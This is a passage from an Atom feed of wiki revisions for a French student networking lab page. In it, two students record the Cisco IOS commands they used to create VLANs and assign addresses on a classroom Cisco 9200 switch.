		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56173</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56173"/>
				<updated>2021-10-25T14:17:29Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Paramétrage des VLANs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port Te1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int te1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int te6/4&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56171</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56171"/>
				<updated>2021-10-25T14:15:15Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Paramétrage des VLANs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port Te1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int te1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 131&lt;br /&gt;
      name internet&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 131&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.12 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int te6/4&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 131&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56169</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56169"/>
				<updated>2021-10-25T14:13:07Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port Te1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int te1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56158</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56158"/>
				<updated>2021-10-25T14:07:00Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Paramétrage des VLANs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert ==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port Te1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int te1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	</feed>